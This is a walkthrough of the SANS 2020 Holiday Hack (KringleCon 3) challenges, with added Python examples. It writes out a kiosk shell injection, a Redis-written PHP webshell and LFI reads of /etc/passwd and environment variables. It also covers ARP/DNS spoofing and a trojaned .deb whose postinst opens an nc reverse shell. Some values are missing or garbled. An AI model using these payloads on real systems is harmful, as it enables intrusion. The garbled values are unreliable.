Kringlecon 3: French Hens

[ ctf  challenges  ]

SANS 2020 Holiday Hack

Journey begins…

Talk to Jingle Ringford and Objective 01 is unlocked

Objective 01: Uncover Santa's Gift List

Question: what gift is Santa planning on getting Josh Wright for the holidays?

In the upper left-hand corner there is a billboard with an image.

Clicking the image gives a high-res version where you can see Santa's List and download the file. There are hints to use a tool to find the answer, but it can be solved by looking closely :) Correct answer is: proxmark

Taking the jump to the Entry room, Shiny Upatree has a terminal challenge and an objective to complete

Terminal Challenge: Kringle Kiosk

The challenge is to break out of the kiosk menu into /bin/bash. Solution: choose Option 4 and enter &/bin/bash at the prompt; the input is handed to a shell unsanitised, so the metacharacter terminates the intended command and starts a shell.
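As an added example (not the kiosk's own script, which is not reproduced on this page), the same bug in Python with echo standing in for whatever renders the badge: the unsafe version builds a command string that /bin/sh re-parses, so a name of &/bin/bash or x; id runs as a command, while the fixed version passes the name as a single argv element. The function names, the badge text and the allowlist policy are assumptions for the illustration.

```python
import re
import subprocess

# Added example, not the KringleCon kiosk script. "echo" stands in for whatever
# renders the name badge; the point is how the user-supplied name reaches it.


def badge_unsafe(name: str) -> str:
    """Vulnerable: the name is spliced into a command string that /bin/sh
    re-parses, so a name such as '&/bin/bash' or 'x; id' runs as a command."""
    command = f"echo Badge for {name}"
    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout


def badge_safe(name: str) -> str:
    """Fixed: no shell involved, the name is one argv element and is never parsed."""
    return subprocess.run(["echo", "Badge", "for", name],
                          capture_output=True, text=True).stdout


def name_is_allowed(name: str) -> bool:
    """Defence in depth: allowlist the name instead of blocklisting '& ; | `'.
    The character set and length limit are assumed, not the kiosk's policy."""
    return re.fullmatch(r"[A-Za-z0-9 .'-]{1,32}", name) is not None


if __name__ == "__main__":
    payload = "x; echo INJECTED"
    print("unsafe:", badge_unsafe(payload))   # a second line, INJECTED, appears
    print("safe:  ", badge_safe(payload))     # the name is printed verbatim
    print("allowed:", name_is_allowed(payload))
```

The kiosk hint about avoiding special characters is a blocklist; the allowlist in name_is_allowed is the shape of check to prefer, and badge_safe shows that with an argv list the check is not even load-bearing.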

Objective 02: Investigate S3 Bucket

Question: When you unwrap the over-wrapped file, what text string is inside the package?

The first part of the objective is to use the provided bucket_finder tool to scan public S3 buckets and find/download the correct file.
To do this, add the green-highlighted word Wrapper3000 from the intro to the wordlist (in both upper and lower case), then scan.
Then go through a series of commands to successfully unwrap the file (package), identifying each layer and stripping it in turn.
This gives the answer of North Pole: The Frostiest Place on Earth
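The unwrapping step is a loop of identify-the-layer, strip-it, repeat. As an added example (not the write-up's command sequence and not the challenge's file), the script below detects a layer by its magic bytes and peels it until plain data remains; it builds its own six-layer sample so it runs offline. The real package's layer order is not reproduced here, and any layer the real file used that is not in the identify() table (an xxd hex dump, for instance) would need its own branch.

```python
import base64
import bz2
import gzip
import io
import lzma
import re
import tarfile
import zipfile

# Added example, not the write-up's command sequence: a generic unwrapper that
# identifies each layer by its magic bytes and strips it until plain data remains.


def identify(data: bytes) -> str:
    if data.startswith(b"\x1f\x8b"):
        return "gzip"
    if data.startswith(b"BZh"):
        return "bzip2"
    if data.startswith(b"\xfd7zXZ\x00"):
        return "xz"
    if data.startswith(b"PK\x03\x04"):
        return "zip"
    if len(data) >= 262 and data[257:262] == b"ustar":
        return "tar"
    # Heuristic: base64 alphabet only once whitespace is removed, length a multiple of 4
    compact = re.sub(rb"\s", b"", data)
    if len(compact) >= 8 and len(compact) % 4 == 0 and re.fullmatch(rb"[A-Za-z0-9+/]+={0,2}", compact):
        return "base64"
    return "plain"


def unwrap_once(data: bytes):
    """Strip one layer; returns (layer name, inner bytes)."""
    kind = identify(data)
    if kind == "gzip":
        return kind, gzip.decompress(data)
    if kind == "bzip2":
        return kind, bz2.decompress(data)
    if kind == "xz":
        return kind, lzma.decompress(data)
    if kind == "zip":
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return kind, zf.read(zf.namelist()[0])   # first member only
    if kind == "tar":
        with tarfile.open(fileobj=io.BytesIO(data)) as tf:
            member = next(m for m in tf.getmembers() if m.isfile())
            return kind, tf.extractfile(member).read()
    if kind == "base64":
        return kind, base64.b64decode(data)        # non-alphabet bytes (newlines) are discarded
    return "plain", data


def unwrap_all(data: bytes, max_layers: int = 32):
    """Return (layer names outermost first, final payload)."""
    layers = []
    for _ in range(max_layers):
        kind, data = unwrap_once(data)
        if kind == "plain":
            break
        layers.append(kind)
    return layers, data


def build_sample() -> bytes:
    """Constructed sample for the demo: tar < xz < zip < bzip2 < gzip < base64."""
    inner = b"The inner text string (constructed sample, not the real answer)\n"
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        info = tarfile.TarInfo("package.txt")
        info.size = len(inner)
        tf.addfile(info, io.BytesIO(inner))
    data = lzma.compress(buf.getvalue())
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("package.xz", data)
    data = gzip.compress(bz2.compress(buf.getvalue()))
    return base64.encodebytes(data)


if __name__ == "__main__":
    layers, payload = unwrap_all(build_sample())
    print(" -> ".join(layers))
    print(payload.decode())
```

The base64 test is the weak link: a short run of letters and digits whose length happens to be a multiple of four will be misidentified, which is why the check is last and why the loop has a layer cap.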

Terminal Challenge: Unescape Tmux

Pepper Minstix has a tmux terminal challenge
The answer is simply tmux attach

Before moving into the Great Hall, pick up a candy cane as an item.

Talk to Sparkle Redberry: an Elevator Service Key is obtained.

Talk to Ginger Breddie, who mentions a half floor on the elevator; pick up a Hex Nut.

Moving to the Dining Room, Rob Bonbowford has The Elf Code challenges

Elf Code Challenges

Code to beat Level 01

Code to beat Level 02 - Trigger The Yeeter
var sum = elf.get_lever(0) + 2

Code to beat Level 03 - Move To Loopiness

Code to beat Level 04 - Up Down Loopiness
for (let i = 0; i < 2; i++) { elf.moveLeft(2); elf.moveUp(40); elf.moveLeft(2); elf.moveDown(40) }

Code to beat Level 05 - Move To Madness
elf.moveTo(lollipop[1])   // lollipop[1, 0] is the JS comma operator and evaluates to lollipop[0]; visit both explicitly
elf.moveTo(lollipop[0])
var value = elf.ask_munch(0)
var answer = value.filter(Number.isInteger)

Code to beat Level 06 - Two Paths, Your Choice
for (let i = 0; i < 4; i++) { elf.moveTo(lollipop[i]) }
var answer = elf.get_lever(0)
answer.unshift("munchkins rule")

Terminal Challenge: Redis Bug Hunt

Holly Evergreen has a Redis terminal challenge

Using curl against the maintenance page shows that Redis commands can be run through it.

Following the link provided in the hints, write a PHP webshell through Redis.

Using that webshell, read index.php to resolve the challenge.

33.6kbps Challenge

Fitzy Shortstack has a challenge to complete a handshake for a modem. The phone number is given: 756-8347

To solve, pick up the handset, dial the number given and choose the sounds in the following order:

baa DEE brrr

Moving to the Courtyard, Sugarplum Mary has a Linux Primer Terminal Challenge and Objective 3

Terminal Challenge: Linux Primer

This challenge has several Linux commands to run in order to get all the candy canes.

Twenty questions in this challenge, each followed by the command that answers it:

  1. Perform a directory listing of your home directory to find a munchkin and retrieve a lollipop! ls
  2. Now find the munchkin inside the munchkin. cat munchkin_19315479765589239
  3. Great, now remove the munchkin in your home directory. rm munchkin_19315479765589239
  4. Print the present working directory using a command. pwd
  5. Good job but it looks like another munchkin hid itself in you home directory. Find the hidden munchkin! ls -alh
  6. Excellent, now find the munchkin in your command history. history
  7. Find the munchkin in your environment variables. env
  8. Next, head into the workshop. cd workshop
  9. A munchkin is hiding in one of the workshop toolboxes. Use “grep” while ignoring case to find which toolbox the munchkin is in. grep -ir munchkin
  10. A munchkin is blocking the lollipop_engine from starting. Run the lollipop_engine binary to retrieve this munchkin. chmod +x lollipop_engine && ./lollipop_engine
  11. Munchkins have blown the fuses in /home/elf/workshop/electrical. cd into electrical and rename blown_fuse0 to fuse0. cd electrical/ && mv blown_fuse0 fuse0
  12. Now, make a symbolic link (symlink) named fuse1 that points to fuse0 ln -s fuse0 fuse1
  13. Make a copy of fuse1 named fuse2. cp fuse1 fuse2
  14. We need to make sure munchkins don't come back. Add the characters "MUNCHKIN_REPELLENT" into the file fuse2. echo "MUNCHKIN_REPELLENT" >> fuse2
  15. Find the munchkin somewhere in /opt/munchkin_den. cd /opt/munchkin_den && ls -alhR . | grep -i munchkin
  16. Find the file created by munchkins that is greater than 108 kilobytes and less than 110 kilobytes located somewhere in /opt/munchkin_den. find . -size +108k -size -110k
  17. List running processes to find another munchkin. ps -aux
  18. The 14516_munchkin process is listening on a tcp port. Use a command to have the only listening port display to the screen. netstat -ant
  19. The service listening on port 54321 is an HTTP server. Interact with this server to retrieve the last munchkin. curl http://localhost:54321
  20. Your final task is to stop the 14516_munchkin process to collect the remaining lollipops. pkill 14516_munchkin

Challenge completed

Objective 3: Point-of-Sale Password Recovery

Question: What is the password for the Point-of-Sale Terminal?
An offline version of the Electron application is available for download to recover the terminal password.

Running the .exe installs the app and gives a password prompt.

Using the link provided in the hints, install asar and extract the source from the app's asar archive.

In the extracted source the password is found: santapass

Objective completed
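As an added example (not the asar tool and not the challenge's app), here is a minimal reader for the asar container that Electron bundles application sources into, a packer used only to construct a sample archive, and a grep for credential-looking lines in the extracted files. The header layout used here (two Chromium pickle records, a JSON index, then file contents with offsets relative to the end of the header) is my understanding of the format and should be checked against the real tool; the file names and the password string in the sample are constructed.

```python
import json
import struct

# Added example, not the asar tool: minimal packer/reader for the asar archive
# format as I understand it: [u32 4][u32 header_len] then
# [u32 payload_len][u32 json_len][json][pad to 4], followed by the raw file bytes
# back to back. Each file's "offset" in the JSON index is relative to the end
# of the header. Verify against the real tool before relying on it.


def pack_asar(files):
    """Build an archive from {"dir/name": bytes}. Used here only to construct a sample."""
    index = {"files": {}}
    blobs = []
    offset = 0
    for path, content in files.items():
        node = index
        *dirs, name = path.split("/")
        for d in dirs:
            node = node["files"].setdefault(d, {"files": {}})
        node["files"][name] = {"size": len(content), "offset": str(offset)}
        blobs.append(content)
        offset += len(content)
    header_json = json.dumps(index).encode()
    payload = struct.pack("<I", len(header_json)) + header_json
    payload += b"\0" * (-len(payload) % 4)          # pickle payloads are 4-byte aligned
    header = struct.pack("<I", len(payload)) + payload
    return struct.pack("<II", 4, len(header)) + header + b"".join(blobs)


def read_asar(data):
    """Return {path: bytes} for every file in the archive."""
    header_len = struct.unpack_from("<I", data, 4)[0]
    json_len = struct.unpack_from("<I", data, 12)[0]
    index = json.loads(data[16:16 + json_len])
    base = 8 + header_len                           # file data starts after the header
    out = {}

    def walk(node, prefix):
        for name, entry in node["files"].items():
            path = prefix + name
            if "files" in entry:                    # directory node
                walk(entry, path + "/")
            else:
                start = base + int(entry["offset"])
                out[path] = data[start:start + entry["size"]]

    walk(index, "")
    return out


def find_hardcoded_secrets(files, needles=(b"password", b"passwd", b"secret")):
    """Grep the extracted sources for credential-looking lines (case-insensitive)."""
    hits = []
    for path, content in files.items():
        for lineno, line in enumerate(content.splitlines(), 1):
            if any(n in line.lower() for n in needles):
                hits.append((path, lineno, line.decode(errors="replace").strip()))
    return hits


# Constructed sample: a two-file Electron app with a hard-coded password
SAMPLE_FILES = {
    "package.json": b'{"main":"main.js"}',
    "src/main.js": b"const PASSWORD = 'constructed-example';\nconsole.log(1);\n",
}

if __name__ == "__main__":
    archive = pack_asar(SAMPLE_FILES)
    for path, lineno, line in find_hardcoded_secrets(read_asar(archive)):
        print(f"{path}:{lineno}: {line}")
```

With a real app.asar, read the file into data and call read_asar followed by find_hardcoded_secrets; the same walk also lets you write the files back out to disk, which is all the asar extract command does.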

Still in the Courtyard, a green light bulb is found in the upper left-hand side of the area

Objective 4: Operate the Santavator

Heading back to the Entry room, it is time to operate the elevator.
Next to the buttons there is a key showing how to power the elevator.

Placing the green light bulb and the hex nut to direct the steam powers the elevator up to level 2.

Objective completed

On the Talks floor, a red light bulb is found upper right-hand corner of the room

Terminal Challenge: Speaker UNPrep

Bushy Evergreen holds three challenges in one for the Speaker UNPrep challenge.

Door app

Running strings against the door binary reveals the password: Op3nTheD00r

Door Open!

Lights app

In the lab section, setting the name in the config to the encrypted password value makes the app reveal the password when run.

Lights On!

Vending Machine app

Looking at the .json config file for the app, there is an encoded password.

Deleting the .json config file in the lab section allows you to create a new name and password.

Looking at the new .json file, you can see the name santa encoded.

After some trial and error with the encoding, the password is revealed: CandyCane1
Vending Machine enabled!

Moving into the room off of the talks lobby, in the lower right-hand corner, the button for the elevator floor 1.5 is found

Checking the vending machine, a portals object is revealed

Moving to the Dining Room, another Hex Nut can be found on the top side of the dining table

Snowball Fight Challenge

Beat the game on Impossible setting
Tangle Coalbox has a game with four different levels to beat

Extra instances:
The player name corresponds to the arrangement of the opponent's board, so a second game started under the same name has the same layout.

Simply hit all the necessary squares before your opponent does.

Strategy for beating Easy through Hard:

  1. Easy: trivial, as you can beat the opponent without running out of turns.
  2. Medium: easily won, as you can choose your name; choose the same one you used when winning Easy and the board is identical.
  3. Hard: you cannot choose your own name, but you can see it once you start. Spin up a new instance on Easy with the same name/number to learn the board.

Winning on Easy-Hard

To complete the Impossible level, it is recommended to watch the Mersenne Twister talk and/or use the tool linked here.
When starting the game, the player ID is shown as redacted.

However, if you look at the page source, you will find 624 random numbers alongside the redacted one.

To recover the redacted number, copy the 624 numbers into a clean file, then cat that file into the Mersenne Twister predictor and take the first predicted number with head -1 (MT19937 needs exactly 624 consecutive 32-bit outputs to reconstruct its state, which is why the page leaks that many).

With that number, spin up another instance on Easy using it as the name to see the board layout, then use that layout to beat the Impossible level.

Moving back to the elevator, it’s now possible to power red and green. This opens both floors 1.5 (Workshop) and rooftop (NetWars)

Taking the elevator to the Workshop, a Large Marble object is found.

Terminal Challenge: Sort-O-Matic

Minty Candycane needs help with the sort-o-matic machine

Regex is needed to solve the challenge; the eight patterns used, in order:

  1. \d
  2. [azAZ]
  3. [a-z0-9]{2}
  4. ^(?!.?[A-L1-5]).
  5. ^[0-9]{3,}$
  6. ^(((([0-1][0-9])|(2[0-3])):?[0-5][0-9]:?[0-5][0-9]+$))
  7. ^[a-fA-F0-9]{2}(:[a-fA-F0-9]{2}){5}$
  8. ^(0[1-9]|1[0-4])\/.-\/.-\d{2}$

Challenge solved

Moving up a room, a Large Marble object is found.

In the same room, a Proxmark3 device is found

Objective 5: Open HID Lock

Use the interactive Proxmark3 device to solve objective 5 and open the door to the Sorting room

Device allows for interaction

Prox IDs can be captured from elves using the auto command on the device.

Correct Prox Id is found on Bow Ninecandle

Heading back to the locked door in the sorting room, using the correct command and Prox Id, the door unlocks

Objective completed. This opens up six new objectives.

From the new room there is a light at the end, going through our character becomes santa :)

With this change, the teleport option opens which makes moving around easier

Objective 6: Splunk Challenge

Question: What is the name of the adversary group that Santa feared would attack KringleCon?

Moving to the Great Room, find Angel Candysalt with the next Objective

Eight total questions in this challenge using Splunk:

  1. How many distinct MITRE ATT&CK techniques did Alice emulate?
    Answer: 13
  2. What are the names of the two indexes that contain the results of emulating Enterprise ATT&CK technique 1059.003? (Put them in alphabetical order and separate them with a space)
    Answer: t1059.003-main t1059.003-win
  3. One technique that Santa had us simulate deals with ‘system information discovery’. What is the full name of the registry key that is queried to determine the MachineGuid?
    Answer: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
  4. According to events recorded by the Splunk Attack Range, when was the first OSTAP related atomic test executed? (Please provide the alphanumeric UTC timestamp.)
    Answer: 2020-11-30T17:44:15Z
  5. One Atomic Red Team test executed by the Attack Range makes use of an open source package authored by frgnca on GitHub. According to Sysmon (Event Code 1) events in Splunk, what was the ProcessId associated with the first use of this component?
    Answer: 3648
  6. Alice ran a simulation of an attacker abusing Windows registry run keys. This technique leveraged a multi-line batch file that was also used by a few other techniques. What is the final command of this multi-line batch file used as part of this simulation?
    Answer: quser
  7. According to x509 certificate events captured by Zeek (formerly Bro), what is the serial number of the TLS certificate assigned to the Windows domain controller in the attack range?
    Answer: 55FCEEBB21270D9249E86F4B9DC7AA60
  8. What is the name of the adversary group that Santa feared would attack KringleCon?
    Answer: The Lollipop Guild

The final answer is solved using the hints given: the ciphertext 7FXjP1lyfKbyDK/MChyf36h7 and RFC 7465 (the RFC that prohibits RC4 in TLS, i.e. the cipher is RC4).
Santa's phrase, which serves as the RC4 key, can be obtained by watching the Adversary Emulation and Automation talk.
Decode in CyberChef: base64-decode the ciphertext, then RC4 with the phrase as the key.

Moving to the NetWars floor, Wunorse Openslae holds the next terminal challenge and Objective 7.

First, the Yellow light bulb for the elevator can be found next to Wunorse.

Objective 7: Solve the Sleigh's CAN-D-BUS Problem

Two filter entries are required to drop the bad frames.

Following codes are determined:
Start: 02A#00FF00
Stop: 02A#0000FF
Lock: 19B#000000000000
Unlock: 19B#00000F000000
Steering: 019 - ALL
Brake: 080 - ALL

Correct Filters to solve:
19B Equals 0000000F2057
080 Contains FFF

Terminal Challenge: CAN-Bus Investigation

Like the objective, this capture file needs to be filtered.

Using the unlock code 19B#00000F000000 found in the objective, the frame can easily be found in the file with grep.

Its timestamp is 1608926671.122520; submit 122520 (the fractional part) as the answer.
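As an added example covering both this challenge and the CAN-D-BUS objective above (not the sleigh's firmware or the challenge's own tooling), the script below parses candump-style log lines, applies the two filter rules from Objective 7 and looks up the unlock frame's timestamp. The log lines are constructed; the "(timestamp) interface ID#DATA" line format is assumed, and only the two rules, the unlock frame and the timestamp value come from the write-up.

```python
import re
from dataclasses import dataclass

# Added example, not the sleigh's own code: candump-style log parsing, the two
# Santavator filter rules, and the unlock-frame timestamp lookup.

LINE_RE = re.compile(
    r"^\((?P<ts>\d+\.\d+)\)\s+(?P<iface>\S+)\s+(?P<id>[0-9A-Fa-f]+)#(?P<data>[0-9A-Fa-f]*)$"
)


@dataclass(frozen=True)
class Frame:
    ts: str        # kept as text so the fractional part survives exactly
    can_id: str    # e.g. "19B"
    data: str      # payload hex, e.g. "00000F000000"


def parse_log(text):
    frames = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            frames.append(Frame(m["ts"], m["id"].upper(), m["data"].upper()))
    return frames


# The two filters from the objective, in the same shape as the sleigh's UI
RULES = [("19B", "equals", "0000000F2057"), ("080", "contains", "FFF")]


def is_rogue(frame, rules=RULES):
    for can_id, op, value in rules:
        if frame.can_id != can_id:
            continue
        if op == "equals" and frame.data == value:
            return True
        if op == "contains" and value in frame.data:
            return True
    return False


def clean(frames, rules=RULES):
    """What the bus looks like once the two filters are applied."""
    return [f for f in frames if not is_rogue(f, rules)]


def first_timestamp(frames, can_id, data):
    """Timestamp of the first frame with this ID and payload, or None."""
    for f in frames:
        if f.can_id == can_id and f.data == data:
            return f.ts
    return None


def fractional_part(ts):
    """The terminal challenge wants only the digits after the decimal point."""
    return ts.split(".")[1]


# Constructed sample log: lock, a normal brake frame, a rogue brake frame, the
# rogue 19B frame, the unlock frame from the write-up, and a steering frame.
SAMPLE_LOG = """\
(1608926670.900000) vcan0 19B#000000000000
(1608926671.000100) vcan0 080#000000
(1608926671.050000) vcan0 080#FFFFF0
(1608926671.100000) vcan0 19B#0000000F2057
(1608926671.122520) vcan0 19B#00000F000000
(1608926671.200000) vcan0 019#00000F
"""

if __name__ == "__main__":
    frames = parse_log(SAMPLE_LOG)
    for f in clean(frames):
        print(f.ts, f.can_id, f.data)
    ts = first_timestamp(frames, "19B", "00000F000000")
    print("unlock at", ts, "-> submit", fractional_part(ts))
```

For the terminal challenge, read the capture file into parse_log instead of SAMPLE_LOG; the grep in the write-up and first_timestamp find the same line.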

Heading to Wrapping Room, to talk with Noel Boetie for the next Objective

Objective 8: Broken Tag Generator

Question: What value is in the environment variable GREETZ?

Given the tag generator link, it appears an upload is possible through the interface.

In Chrome Dev Tools, the uploaded image can be found and requested directly using the id= parameter.

Uploading a .php file fails, but the response reveals the path where uploads are stored.

After some trial and error, an LFI is found and /etc/passwd can be read.

Reading /proc/self/environ the same way gives the answer: JackFrostWasHere

Heading back to NetWars floor, Alabaster Snowball has a Terminal challenge and Objective 9

Terminal Challenge: Scapy Prepper

15 Scapy questions, each followed by its answer:

  1. Start by running the task.submit() function passing in a string argument of 'start'. task.submit('start')
  2. Submit the class object of the scapy module that sends packets at layer 3 of the OSI model. task.submit(send)
  3. Submit the class object of the scapy module that sniffs network packets and returns those packets in a list. task.submit(sniff)
  4. Submit the NUMBER only from the choices below that would successfully send a TCP packet and then return the first sniffed response packet to be stored in a variable named "pkt": task.submit(1)
    1. pkt = sr1(IP(dst="")/TCP(dport=20))
    2. pkt = sniff(IP(dst="")/TCP(dport=20))
    3. pkt = sendp(IP(dst="")/TCP(dport=20))
  5. Submit the class object of the scapy module that can read pcap or pcapng files and return a list of packets. task.submit(rdpcap)
  6. The variable UDP_PACKETS contains a list of UDP packets. Submit the NUMBER only from the choices below that correctly prints a summary of UDP_PACKETS: task.submit(2)
    1. UDP_PACKETS.print()
    3. UDP_PACKETS.list()
  7. Submit only the first packet found in UDP_PACKETS. task.submit(UDP_PACKETS[0])
  8. Submit only the entire TCP layer of the second packet in TCP_PACKETS. pkt = TCP_PACKETS[1]; task.submit(pkt[TCP])
  9. Change the source IP address of the first packet found in UDP_PACKETS to and then submit this modified packet. pkt = UDP_PACKETS[0]; pkt[IP].src = ''; task.submit(pkt[IP])
  10. Submit the password "task.submit('elf_password')" of the user alabaster as found in the packet list TCP_PACKETS. Inspect TCP_PACKETS[6] to read it, then task.submit('echo')
  11. The ICMP_PACKETS variable contains a packet list of several icmp echo-request and icmp echo-reply packets. Submit only the ICMP chksum value from the second packet in the ICMP_PACKETS list. ICMP_PACKETS[1][ICMP].chksum gives 19524, then task.submit(19524)
  12. Submit the number of the choice below that would correctly create a ICMP echo request packet with a destination IP of stored in the variable named "pkt". task.submit(3)
    1. pkt = Ether(src='')/ICMP(type="echo-request")
    2. pkt = IP(src='')/ICMP(type="echo-reply")
    3. pkt = IP(dst='')/ICMP(type="echo-request")
  13. Create and then submit a UDP packet with a dport of 5000 and a dst IP of (all other packet attributes can be unspecified). pkt = IP(dst='')/UDP(dport=5000); task.submit(pkt)
  14. Create and then submit a UDP packet with a dport of 53, a dst IP of, and is a DNS query with a qname of "elveslove.santa" (all other packet attributes can be unspecified). pkt = IP(dst='')/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname='elveslove.santa')); task.submit(pkt)
  15. The variable ARP_PACKETS contains an ARP request and response packets. The ARP response (the second packet) has 3 incorrect fields in the ARP layer. Correct the second packet in ARP_PACKETS to be a proper ARP response and then task.submit(ARP_PACKETS) for inspection. pkt = ARP_PACKETS[1]; pkt[ARP].op = 2; pkt[ARP].hwsrc = '00:13:46:0b:22:ba'; pkt[ARP].hwdst = '00:16:ce:6e:8b:24'; task.submit(ARP_PACKETS) (the third wrong field is the opcode, which must be 2, is-at, for a reply)

Objective 9: ARP Shenanigans

Retrieve the document at /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt. Who recused herself from the vote described in the document?
For this challenge, spoofing ARP and then DNS is necessary, after which a way must be found to serve a malicious .deb package in order to read the file listed.
There are both ARP and DNS starter scripts in the /scripts folder and .deb packages in the /debs folder

ARP Spoof
First find the MAC address of the target using tcpdump -nei eth0; it is 4c:24:57:ab:ed:84.

Get the local info using ifconfig: the local IP and MAC (02:42:0a:06:00:06).

Next update the ARP script with this information

With tcpdump running, kick off the updated ARP script. There should be an ARP response pointing at the local MAC address, followed by a DNS query from the target.

Then update the DNS script with the information obtained.

With tcpdump running, kick off both the updated ARP and DNS scripts (multiple terminal windows can be open at once). Additional traffic will show.

In the additional traffic there is a connection to port 80. With the same setup as before, open an additional window with a listener on port 80. This reveals a request for a .deb package.

Loosely following the Offensive Security guide linked here, a reverse shell can be obtained.
Package/system setup with the following commands (the nc line is the payload appended to workdir/DEBIAN/postinst, so it runs when the package is installed):
dpkg -x netcat-traditional_1.10-41.1ubuntu1_amd64.deb workdir
mkdir -p workdir/DEBIAN
dpkg-deb -e netcat-traditional_1.10-41.1ubuntu1_amd64.deb
cp DEBIAN/postinst DEBIAN/control workdir/DEBIAN/
/bin/nc -e /bin/bash 1337
dpkg-deb --build workdir/
mkdir -p pub/jfrost/backdoor
cp workdir.deb pub/jfrost/backdoor/suriv_amd64.deb
cd ~/debs/
python3 -m http.server 80
nc -nlvvp 1337

With both the reverse-shell listener and the web server up, trigger the DNS script followed by the ARP script, and a reverse shell on the target arrives.

Reading the output of the document, Tanta Kringle is the answer for the objective.

Objective 10: Defeat Fingerprint Sensor

Bypass the fingerprint sensor on the elevator.
For the next objective, switch back to your normal self by going to the Entry room and heading through the painting of Santa.
First get the elevator to full power, now that the Yellow light bulb has been obtained.

Looking in Chrome's dev tools, there is a besanta value associated with the elevator iframe.

Adding besanta to the iframe's URL reloads the page, and the fingerprint scan is then allowed.

Tinsel Upatree holds the clue for the next Objective, but our character must be Santa
Switching back, the next clue is a blockchain.dat file available for download here. Also, Tinsel provides some tools to help in the next objective available for download here

Objective 11a: Naughty/Nice List with Blockchain Investigation Part 1

Even though the chunk of the blockchain that you have ends with block 129996, can you predict the nonce for block 130000?
Provided in the tools are the necessary Python script and certificates. The first step is to update the script to read information out of the blockchain file.
The following code is uncommented in the script, with modification (the public key is read from the PEM file, then the chain is loaded and verified against it):
with open('official_public.pem', 'rb') as fh:
    official_public_key = RSA.importKey(fh.read())
c2 = Chain(load=True, filename='blockchain.dat')
print('C2: Block chain verify: %s' % (c2.verify_chain(official_public_key)))

This prints out one block, starting at 128449. It needs to go up to 129996 according to the objective.
Code update: replace print(c2.blocks[0]) with a loop over every block:
for i in range(1548):
    print(c2.blocks[i])

Running the script again prints all blocks up to 129996, a total of 1548 blocks (129996 - 128449 + 1).
Next, extract the nonces:
./ > output
cat output | grep Nonce > nonces
cat nonces | cut -c 22-38 > real_nonces

Running these commands gives a total of 1548 nonces, but the Mersenne Twister predictor needs exactly 624 consecutive 32-bit outputs, so the list must be cut down: keep only the last 624, i.e. remove all nonces before number 925.
However, because the Mersenne Twister is 32-bit and each nonce is a 64-bit value, the nonces need to be converted from hex and split into lower and upper 32-bit halves. Each nonce therefore supplies two outputs, so only the last 312 nonces are needed: remove all nonces before number 1237.

The following code prints 312 lower and 312 upper 32-bit numbers, lower half first for each nonce (the order in which the generator emits them). Run it and redirect the output to a file, e.g. converted_split_nonces:
with open('real_nonces', 'r') as f:
    lines = f.readlines()
for g in lines:
    s = int(g, 16)
    o = s & 0xffffffff   # lower 32 bits, emitted first
    i = (s >> 32)        # upper 32 bits, emitted second
    print(o)
    print(i)

Feeding these numbers to the Mersenne Twister predictor gives the next 32-bit outputs, i.e. the lower and upper halves of each subsequent nonce. The objective asks for nonce 130000 and the output ended at 129996, so four nonces (eight 32-bit values) ahead are needed; run the following and take the last two numbers:
cat converted_split_nonces | mt19937predict | head -n 8

From the Python CLI, the hex nonce for 130000 is obtained by recombining the lower half a and the upper half b and converting the result to hex:
a = 4079973021
b = 1460036376
c = b << 32 | a
hex(c)

This yields the answer, which is submitted without the 0x prefix.
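As an added example serving both the Snowball Fight redaction above and this objective (it is not the mt19937predict tool the write-up uses), the script below recovers the MT19937 state from 624 consecutive 32-bit outputs by inverting the output tempering, then clones the generator with Python's random module (itself MT19937) to predict further outputs. For nonces it splits each 64-bit value into its lower and upper halves, lower first, and rejoins predictions the same way. The sample streams are generated from a known seed so the predictions can be checked; the real inputs are the 624 numbers from the game page or the 312 values in real_nonces.

```python
import random

# Added example, not the mt19937predict tool: MT19937 state recovery from 624
# consecutive outputs, then prediction via Python's own MT19937 (random.Random).

MASK32 = 0xFFFFFFFF


def _undo_right_shift_xor(y, shift):
    # Inverts y ^= y >> shift. The top `shift` bits are untouched; each pass
    # recovers the next `shift` bits below them.
    x = y
    for _ in range(32 // shift + 1):
        x = y ^ (x >> shift)
    return x


def _undo_left_shift_and_xor(y, shift, mask):
    # Inverts y ^= (y << shift) & mask. The low `shift` bits are untouched;
    # each pass recovers the next `shift` bits above them.
    x = y
    for _ in range(32 // shift + 1):
        x = y ^ ((x << shift) & mask)
    return x & MASK32


def untemper(y):
    """Undo MT19937's four tempering steps, in reverse order, giving the state word."""
    y = _undo_right_shift_xor(y, 18)
    y = _undo_left_shift_and_xor(y, 15, 0xEFC60000)
    y = _undo_left_shift_and_xor(y, 7, 0x9D2C5680)
    y = _undo_right_shift_xor(y, 11)
    return y


def predictor_from_outputs(outputs):
    """Clone the generator from exactly 624 consecutive 32-bit outputs."""
    if len(outputs) != 624:
        raise ValueError("need exactly 624 consecutive 32-bit outputs")
    state = tuple(untemper(o & MASK32) for o in outputs)
    rng = random.Random()
    rng.setstate((3, state + (624,), None))   # index 624: next call regenerates the block
    return rng


def split_nonce(n):
    """64-bit nonce -> (lower, upper) 32-bit words, in generation order."""
    return n & MASK32, (n >> 32) & MASK32


def join_nonce(lower, upper):
    return (upper << 32) | lower


def predictor_from_nonces(nonces):
    """Clone the generator from the last 312 64-bit nonces (624 words)."""
    words = [w for n in nonces for w in split_nonce(n)]
    return predictor_from_outputs(words[-624:])


def predict_nonce(nonces, ahead=1):
    """The nonce `ahead` positions after the last one supplied (ahead=4 is 130000 after 129996)."""
    rng = predictor_from_nonces(nonces)
    value = None
    for _ in range(ahead):
        value = rng.getrandbits(64)   # lower word is drawn first, then upper
    return value


def sample_stream(seed, count, bits=32):
    """Const­ructed sample: outputs of Python's MT19937 seeded with `seed`."""
    rng = random.Random(seed)
    return [rng.getrandbits(bits) for _ in range(count)]


if __name__ == "__main__":
    nonces = sample_stream(130000, 316, bits=64)
    print(hex(predict_nonce(nonces[:312], ahead=4)), "expected", hex(nonces[315]))
```

The 32-bit case is the Snowball Fight: pass the 624 numbers from the page to predictor_from_outputs and the first getrandbits(32) is the redacted ID. The 64-bit case is this objective: real_nonces parsed as integers, predict_nonce(..., ahead=4), and hex() of the result without the 0x.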

